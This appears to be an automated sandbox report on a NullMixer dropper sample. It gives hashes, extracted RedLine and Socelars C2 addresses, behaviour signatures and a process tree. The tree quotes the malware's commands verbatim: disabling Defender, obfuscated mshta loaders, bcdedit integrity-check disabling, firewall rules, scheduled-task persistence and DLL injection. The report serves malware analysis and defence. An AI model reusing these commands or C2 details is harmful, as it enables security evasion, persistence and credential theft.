Overview

overview

10

Static

static

3

b592fd0fd3...fa.exe

windows7-x64

10

b592fd0fd3...fa.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06-11-2024 10:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

  • Size

    19.5MB

  • MD5

    929d44bb23bdaf1900b64c607b0d79f5

  • SHA1

    b24c6b9ffe07f42848b1b216127ae4031f7dc284

  • SHA256

    b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa

  • SHA512

    2c7fbd126ae014d876e86a489f5cfd633f29c70009380f6e459ce2b25c9c2a533d7217472c99f2e5687d16b72b8bed7ac3a2acb510fffc5ca5f77898f6b217ee

  • SSDEEP

    393216:xmdgzx7vz4dPQEf92YI+20uaVccpGaX/mlUBbRgAhRasJBg4qXRQvXowf:Mdgzt74ak9JU0u0nTPmWFRgAJxvYwf

Score
10/10
fabookiegluptebanullmixerprivateloaderredlinesocelarsmedia22m11publisher2user2211aspackv2discoverydropperevasionexecutioninfostealerloaderpersistenceprivilege_escalationrootkitspywarestealertrojan

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

Botnet

user2211

C2

135.181.129.119:4805

Attributes
  • auth_value

    222774f9cd78b757b41900a0740f5b77

Extracted

Family

redline

Botnet

media22m11

C2

91.121.67.60:51630

Attributes
  • auth_value

    67c1e9660a9418bffb56bc0010363b04

Extracted

Family

redline

Botnet

Publisher2

C2

135.181.79.37:10902

Attributes
  • auth_value

    e8393a62fb4a9e46504192de2bb05302

Signatures

  • Detect Fabookie payload 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

    spywarestealerfabookie
  • Fabookie family
    fabookie
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

    droppernullmixer
  • Nullmixer family
    nullmixer
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 3 IoCs
  • Redline family
    redline
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars family
    socelars
  • Socelars payload 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • ASPack v2.12-2.42 3 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
    evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe
    "C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:352
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe
          Mon166dc6040fb8726.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2572
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe
          Mon16bd4a93b822a.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:804
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1596
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon1661118952.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1920
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe
          Mon1661118952.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1672
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:616
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2772
              • C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE
                WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2556
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2452
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:2492
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN( "C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W " , 0 , TrUe ) )
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:1048
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W
                    9⤵
                    • System Location Discovery: System Language Discovery
                    PID:1300
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" ECho "
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:2144
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:1764
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 -s aGKpQ.W
                      10⤵
                      • System Location Discovery: System Language Discovery
                      PID:316
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill -IM "Mon1661118952.exe" -F
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1292
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2128
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe
          Mon16b7581baf7.exe /mixtwo
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1624
        • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
          Mon167f9db638e4.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
          • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe"
            5⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2480
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              6⤵
                PID:1632
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  7⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • Modifies data under HKEY_USERS
                  PID:2620
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe /306-306
                6⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2508
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1772
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  7⤵
                    PID:2004
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    PID:2756
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1812
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2512
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2160
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:888
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1484
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2420
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1304
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2504
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2564
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2820
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2788
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2688
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      8⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1712
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1528
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    7⤵
                    • Executes dropped EXE
                    PID:2104
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2120
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2300
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1032
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe
              Mon1618e4439d986270.exe
              4⤵
              • Executes dropped EXE
              PID:372
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe
              Mon1631358b82299bd8.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1480
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2460
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:584
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2588
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
              Mon16d070a064013c841.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:2016
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2132
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2864
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
              Mon16734014a69dec.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:1508
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1868
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3000
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
              Mon16737798ac26f984.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1928
              • C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1948
                • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: GetForegroundWindowSpam
                    PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1068
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe
              Mon164c5af508c3.exe
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1784
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2896
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe
              Mon16957e622fa390.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:956
              • C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:292
                • C:\Program Files (x86)\Gparted\Build.sfx.exe
                  "C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • System Location Discovery: System Language Discovery
                  PID:588
                  • C:\Program Files (x86)\Gparted\Build.exe
                    "C:\Program Files (x86)\Gparted\Build.exe"
                    7⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3000
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
                      8⤵
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:892
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1672
                      8⤵
                      • Program crash
                      PID:1228
                • C:\Program Files (x86)\Gparted\gimagex.exe
                  "C:\Program Files (x86)\Gparted\gimagex.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:492
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2940
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe
              Mon16ac385cfd.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2368
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2992
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
              Mon16e127a54386dd68.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1100
              • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2216
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe
            3⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2984
            • C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe
              Mon161bd381a14aea5c.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1448
